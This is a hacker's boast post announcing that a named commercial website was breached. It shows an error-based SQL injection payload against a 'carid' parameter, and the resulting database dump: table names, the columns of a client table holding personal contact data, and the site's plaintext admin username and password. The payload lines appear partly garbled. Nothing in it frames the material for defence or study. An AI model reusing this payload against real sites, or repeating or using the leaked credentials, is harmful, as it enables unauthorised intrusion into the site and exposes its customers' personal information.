thriftyoman.com Hacked By Gr33nRage

1. :::::_WARNING ADMIN!!_:::::
2. ________________________________
3. http://www.twitter.com/Gr33nRage
4.  
5. Hacker: Gr33nRage
6.  
7. Target: www.thriftyoman.com
8. ________________________________
9. Type: error-based
10. Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
11. Payload: carid=140 AND (SELECT 6293 FROM(SELECT COUNT(*),CONCAT(CHA
12. 115,110,58),(SELECT (CASE WHEN (6293=6293) THEN 1 ELSE 0 END)),CHAR(58,
13. 06,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
14.  
15. available databases [2]:
16. [*] cifp48_thriftyomandb
17. [*] information_schema
18.  
19. Database: cifp48_thriftyomandb
20. [10 tables]
21. +---------------------+
22. | `booking-old` |
23. | additional_services |
24. | admin_user |
25. | client |
26. | globals |
27. | hot_deals |
28. | location |
29. | product_category |
30. | reservation |
31. | visiter_log |
32. +---------------------+
33.  
34. Database: cifp48_thriftyomandb
35. Table: client
36. [8 columns]
37. +------------+--------------+
38. | Column | Type |
39. +------------+--------------+
40. | address | varchar(255) |
41. | email | varchar(255) |
42. | fax | varchar(255) |
43. | id | int(4) |
44. | mobile | varchar(255) |
45. | name | varchar(255) |
46. | phone | varchar(255) |
47. | refference | varchar(255) |
48. +------------+--------------+
49.  
50. Database: cifp48_thriftyomandb
51. Table: admin_user
52. [2 columns]
53. +----------+--------------+
54. | Column | Type |
55. +----------+--------------+
56. | password | varchar(255) |
57. | username | varchar(255) |
58. +----------+--------------+
59.  
60.  
61. Database: cifp48_thriftyomandb
62. Table: admin_user
63. [1 entry]
64. +-----------+------------+
65. | password | username |
66. +-----------+------------+
67. | Online_87 | superadmin |
68. +-----------+------------+